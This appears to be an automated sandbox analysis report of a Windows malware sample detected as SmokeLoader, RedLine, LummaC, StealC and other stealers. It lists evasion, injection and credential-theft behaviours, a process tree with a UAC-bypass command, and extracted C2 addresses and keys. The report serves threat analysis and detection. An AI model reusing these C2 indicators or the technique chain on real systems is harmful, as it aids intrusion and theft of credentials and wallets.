Edit tour

Windows Analysis Report
uVQLD8YVk6.exe

Overview

General Information

Sample name:	uVQLD8YVk6.exe renamed because original name is a hash value
Original sample name:	c833507635537e50f5e884eb8242fea0.exe
Analysis ID:	1367445
MD5:	c833507635537e50f5e884eb8242fea0
SHA1:	b2f9169c79f74f8c32adc2c33c95b5072c2665c3
SHA256:	de3b0cedbb0ce19fed2c76e7b1d160e8580644820ef5ef4d4e843379fd4c6289
Tags:	exeRedLineStealer
Infos:

Detection

LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

UAC bypass detected (Fodhelper)

Yara detected AntiVM3

Yara detected Glupteba

Yara detected LummaC Stealer

Yara detected Petite Virus

Yara detected RHADAMANTHYS Stealer

Yara detected RedLine Stealer

Yara detected SmokeLoader

Yara detected Stealc

Yara detected Vidar stealer

Yara detected zgRAT

.NET source code references suspicious native API functions

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Connects to many ports of the same IP (likely port scanning)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Creates an undocumented autostart registry key

Deletes itself after installation

Drops PE files to the startup folder

Drops large PE files

Found Tor onion address

Found many strings related to Crypto-Wallets (likely being stolen)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Maps a DLL or memory area into another process

PE file contains section with special chars

PE file has a writeable .text section

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses process hollowing technique

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses ping.exe to check the status of other devices and networks

Writes to foreign memory regions

Yara detected Generic Downloader

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to detect virtual machines (SGDT)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file does not import any functions

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Stores files to the Windows start menu directory

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

uVQLD8YVk6.exe (PID: 7444 cmdline: C:\Users\user\Desktop\uVQLD8YVk6.exe MD5: C833507635537E50F5E884EB8242FEA0)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

4854.exe (PID: 7792 cmdline: C:\Users\user\AppData\Local\Temp\4854.exe MD5: 1713300BA962C869477E37E4B31E40AF)

RegSvcs.exe (PID: 7924 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 7932 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)

780F.exe (PID: 8040 cmdline: C:\Users\user\AppData\Local\Temp\780F.exe MD5: ED2FD5173AF900C56220101CE6648515)

InstallSetup8.exe (PID: 8092 cmdline: "C:\Users\user\AppData\Local\Temp\InstallSetup8.exe" MD5: 31F42479194700F598C22EA83FA196C1)

InstallSetup8.exe (PID: 8140 cmdline: "C:\Users\user\AppData\Local\Temp\InstallSetup8.exe" MD5: 31F42479194700F598C22EA83FA196C1)

BroomSetup.exe (PID: 7252 cmdline: C:\Users\user\AppData\Local\Temp\BroomSetup.exe MD5: 00E93456AA5BCF9F60F84B0C0760A212)

nsa984B.tmp.exe (PID: 7684 cmdline: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe MD5: F2AD59753E17F68CF6F6F251E0D4DEEC)

toolspub2.exe (PID: 8176 cmdline: "C:\Users\user\AppData\Local\Temp\toolspub2.exe" MD5: 2D24E3BAA2A16E47BEE10E91381E6391)

toolspub2.exe (PID: 7256 cmdline: "C:\Users\user\AppData\Local\Temp\toolspub2.exe" MD5: 2D24E3BAA2A16E47BEE10E91381E6391)

31839b57a4f11171d6abc8bbc4451ee4.exe (PID: 7216 cmdline: "C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe" MD5: 1E40D9A53D79AA807EB8AF132F417E53)

cmd.exe (PID: 5824 cmdline: C:\Windows\Sysnative\cmd.exe /C fodhelper MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tuc4.exe (PID: 7260 cmdline: "C:\Users\user\AppData\Local\Temp\tuc4.exe" MD5: 69CF42BBFE7778CE5D750AA4B51AAD9D)

tuc4.tmp (PID: 3484 cmdline: "C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp" /SL5="$1B0070,7884275,54272,C:\Users\user\AppData\Local\Temp\tuc4.exe" MD5: A7662827ECAEB4FC68334F6B8791B917)

tuc4.exe (PID: 3668 cmdline: "C:\Users\user\AppData\Local\Temp\tuc4.exe" /SPAWNWND=$10488 /NOTIFYWND=$1B0070 MD5: 69CF42BBFE7778CE5D750AA4B51AAD9D)

tuc4.tmp (PID: 7584 cmdline: "C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp" /SL5="$104CE,7884275,54272,C:\Users\user\AppData\Local\Temp\tuc4.exe" /SPAWNWND=$10488 /NOTIFYWND=$1B0070 MD5: A7662827ECAEB4FC68334F6B8791B917)

net.exe (PID: 2872 cmdline: "C:\Windows\system32\net.exe" helpmsg 23 MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 7872 cmdline: C:\Windows\system32\net1 helpmsg 23 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

datapumpcrt.exe (PID: 7908 cmdline: "C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe" -i MD5: A8F6256F7E6C68B81633AE38A46013CE)

etopt.exe (PID: 5220 cmdline: "C:\Users\user\AppData\Local\Temp\etopt.exe" MD5: F77ABC2F79780428CA514C0041C8B9E9)

etopt.exe (PID: 7288 cmdline: "C:\Users\user\AppData\Local\Temp\etopt.exe" MD5: F77ABC2F79780428CA514C0041C8B9E9)

88D9.exe (PID: 5284 cmdline: C:\Users\user\AppData\Local\Temp\88D9.exe MD5: 1A344159928228AF15C9BD838C73E319)

conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 2992 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

928F.exe (PID: 5408 cmdline: C:\Users\user\AppData\Local\Temp\928F.exe MD5: 04F93F610DF4D1C941EC7F64679E3039)

RegSvcs.exe (PID: 3260 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)

9E77.exe (PID: 4048 cmdline: C:\Users\user\AppData\Local\Temp\9E77.exe MD5: 700A9938D0FCFF91DF12CBEFE7435C88)

C086.exe (PID: 6960 cmdline: C:\Users\user\AppData\Local\Temp\C086.exe MD5: 1A28322108062B67D4248CBFE145DEBF)

dialer.exe (PID: 7056 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

CFAA.exe (PID: 6776 cmdline: C:\Users\user\AppData\Local\Temp\CFAA.exe MD5: 460167998760122937411C5191649DBA)

F38F.exe (PID: 2564 cmdline: C:\Users\user\AppData\Local\Temp\F38F.exe MD5: 9C815131562310CCECBBE81C49E57029)

cmd.exe (PID: 2840 cmdline: "C:\Windows\System32\cmd.exe" /c copy "C:\Users\user\AppData\Local\Temp\F38F.exe" "C:\ProgramData\xQfUeydaBrjuHptx.exe" && ping 1.1.1.1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 1888 cmdline: ping 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)

33A6.exe (PID: 7924 cmdline: C:\Users\user\AppData\Local\Temp\33A6.exe MD5: 246EB9F40EF75F048C065DE2F8903289)

srvwauv (PID: 7768 cmdline: C:\Users\user\AppData\Roaming\srvwauv MD5: C833507635537E50F5E884EB8242FEA0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11 https://medium.com/s2wblog/lumma-stealer-targets-youtubers-via-spear-phishing-email-ade740d486f7	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Glupteba	Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.	No Attribution	http://resources.infosecinstitute.com/tdss4-part-1/ https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/ https://blog.google/technology/safety-security/new-action-combat-cyber-crime/ https://blog.google/threat-analysis-group/disrupting-glupteba-operation/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/	https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba

Name	Description	Attribution	Blogpost URLs	Link
Rhadamanthys	According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.	Sandworm	https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023 https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88 https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf	https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/ https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: StealC

{"C2 url": "http://5.42.66.58/3886d2276f6914c4.php"}

Threatname: LummaC

{"C2 url": ["soupinterestoe.fund", "dayfarrichjwclik.fun", "neighborhoodfeelsa.fun", "ratefacilityframw.fun", "reviveincapablewew.pw", "cakecoldsplurgrewe.pw", "opposesicknessopw.pw", "politefrightenpowoa.pw"]}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://185.215.113.68/fks/index.php", "http://185.215.113.68/fks/index.php"]}

Threatname: RedLine

{"C2 url": "195.20.16.103:18305", "Bot Id": "666", "Authorization Header": "6a285b1c7a795c394e7d6aadc56f52aa"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
uVQLD8YVk6.exe	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-PFHT1.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-S6TO1.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-N2733.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-458PU.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-L31R1.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Users\user\AppData\Local\Temp\33A6.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-HBK1Q.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-FH8NJ.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Users\user\AppData\Roaming\srvwauv	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-RFBIV.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Users\user\AppData\Local\Temp\4854.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Click to see the 6 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000021.00000002.2254271275.000000001BB01000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2579639062.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2749142755.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000001F.00000002.3077167175.0000000002435000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000004.00000002.1911380987.0000000004ACA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000022.00000003.2733384950.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2685718453.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2598657111.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2671933578.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2589623228.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2601421528.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000003.00000002.1918764869.0000000002080000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000003.00000002.1918764869.0000000002080000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000022.00000003.2579353533.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2766322903.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000001E.00000003.2170961305.00000000025A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
00000020.00000002.2626410097.0000000000D43000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
00000022.00000003.2524246310.00000162B3841000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2735752153.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2599342972.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000011.00000002.2145002254.0000000000500000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000011.00000002.2145002254.0000000000500000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000029.00000000.2368989273.0000000000792000.00000002.00000001.01000000.00000023.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000022.00000003.2224899162.00000162B30E0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000008.00000002.3067317156.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
00000022.00000003.2754627663.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2674739926.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2711828784.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000022.00000003.2675907860.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2578924547.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2637787202.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2575495914.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2705435281.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2573590064.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2604182414.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2703030103.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2675453290.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2600355817.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2675138321.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2564289331.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2642967465.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2734180264.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2689183677.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
00000022.00000003.2686086613.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2633965317.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2669460233.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2564740508.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000008.00000002.3090070335.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000022.00000003.2738413729.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000F.00000002.2702934288.0000000002A89000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001F.00000002.3068398850.0000000000400000.00000040.00000001.01000000.0000001C.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1676508085.00000000004F1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1676508085.00000000004F1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000010.00000000.2059737099.0000000000401000.00000020.00000001.01000000.0000000E.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000022.00000003.2593035447.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2672383899.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000022.00000003.2578573733.00000162B3938000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
